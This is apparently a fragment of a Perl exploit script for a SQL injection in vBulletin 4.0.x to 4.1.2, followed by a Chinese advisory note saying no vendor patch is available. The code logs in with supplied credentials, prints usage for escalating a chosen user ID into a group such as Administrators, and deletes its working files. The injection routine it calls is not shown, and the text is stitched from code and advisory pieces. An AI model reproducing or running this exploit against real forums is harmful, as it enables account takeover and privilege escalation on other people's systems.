sub login(@)
{
my $username = shift;
my $password = shift;
print "\nLogging in...\n";
sleep(1);
my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
$req->content_type('application/x-www-form-urlencoded');
$req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
$ua->cookie_jar({});
my $res = $ua->request($req);
#print "\n"; print $res->content; print "\n";
open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2);
request();
}
if($ARGV[0] eq '' || $ARGV[1] eq '' || $ARGV[2] eq '' || $ARGV[3] eq '' || $ARGV[4] eq '')
{
print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n";
print "Author: D35m0nd142\n\n";
print "Usage: perl exploit.pl <<> <valid username> <valid passwd> <existent group> <userid to hack>\n";
print "Example: perl exploit.pl myusername mypassword Administrators 1\n\n";
exit(1);
}
print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n";
print "Author: D35m0nd142\n";
sleep(1);
login($ARGV[1],$ARGV[2]);
@files = ('vbloginout.txt','vbout.txt','vbloc.txt');
foreach $file (@files)
{
unlink $file;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: